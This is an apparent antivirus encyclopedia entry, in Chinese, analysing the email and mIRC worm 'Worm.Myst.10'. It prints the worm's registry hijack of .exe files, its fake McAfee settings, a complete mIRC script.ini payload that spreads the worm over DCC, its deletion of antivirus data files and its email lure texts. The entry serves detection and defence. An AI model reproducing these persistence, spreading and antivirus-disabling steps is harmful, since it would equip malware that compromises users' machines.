Worm.Myst.10

病毒名稱(中文): 我的最愛 病毒別名: Email-Worm.Win32.generic[AVP],I-Worm/Myst.10[KV],W 威脅級別: ★★☆☆☆ 病毒類型: 蠕蟲病毒 病毒長度: 80384 影響系統: Win9xWinNT 病毒行爲: 這是一個用VB編寫的蠕蟲病毒，該病毒通過電子郵件和mIRC聊天系統進行傳播。該病毒會修改.exe的文件關聯到病毒，使得每次運行exe文件的時候該病毒都會被執行；該病毒會刪除三款殺毒軟件的某些數據使得這些殺毒軟件無法正常運行。該病毒除了通過在Outlook地址薄裏面收集郵件地址，將病毒做爲附件發送出去之外，它還會通過向mIRC的腳本配置文件中寫入一些腳本，使得該病毒能夠通過mIRC聊天系統傳播。 1)病毒將自己拷貝到： 　C:\windows\system\systray_.exe C:\windows\system\runtray_.dll 2)釋放臨時文件C:\ModReg.reg，並通過regedit/sC:\ModReg.reg命令寫入注冊表 　修改exe的文件關聯到病毒，使得每次運行exe文件的時候該病毒都會被執行 　HKEY_CLASSES_ROOT\exefile\shell\open\command 　(Default)=""C:\windows\system\systray_.exe"%1%*" 　HKEY_LOCAL_MACHINE\Software\McAfee\Scan95 　"SerialNum"="MYSTv1.0byMYSTiQUE" 　"CurrentVersionNumber"="666" 　"DAT"="NONE" 　"DATFile"="-2000" 　"VirusInfoURL"="http://ma***.sexchat.***" 　"bVShieldEnabled"=0x0 　爲病毒添加啓動項： 　HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 　"SystemTray"="C:\Windows\system\systray_.exe" 3)向mIRC的腳本配置文件C:\mirc\script.ini中寫入以下內容，使得該病毒能夠通過mIRC聊天系統傳播 　[script] 　n0=on1:TEXT:*sex*:#:{ 　n1=.msg$nickHello,sorrytodisturbyou,butIjustgotaverykinkyadultslideshowandwaswonderingifyouwould　likeacopy.SoI"mgoingtosendyouone. 　n2=.copyC:\windows\system\runtray_.dllC:\windows\system\install_show.exe 　n3=.dccsend$nickC:\windows\system\install_show.exe 　n4=} 4)刪除三款殺毒軟件的以下文件： 　　C:\ProgramFiles\NortonAntiVirus\*.dat 　　C:\ProgramFiles\KasperskyLab\KasperskyAnti-VirusPersonalPro\*.* 　　C:\ProgramFiles\CommonFiles\KAVSharedFiles\*.* 5)在Outlook裏面收集郵件地址，並將病毒做爲附件發送給這些郵件接收者 　取下面的某一行做爲郵件主題： 　Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanadultscreensaverslideshowprogram 　Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanOutlookServiceReleaseupgrade 　Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforaMicrosoftExplorerPatch 　Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforaDesktopGameIgotofftheinternet 　Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforabrand-newMP3playerandplug-ins 　Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanMicrosoftInternetExplorerServicePack(Q401243) 　Hereisthee-mailattachmentItoldyouaboutearlier,It"saninstallationprogramforanKasperskyAnti-Virus4.0bugfix 郵件正文： 　Hey,sorryIhaven"twrittentoyouinawhile.Wellyoucouldcallitawhile.I"mwritingthisE-mailtoletyou　knowofanattachmentimsendingwiththenextmail. 　 　Hereitis 　郵件附件：C:\windows\install_.exe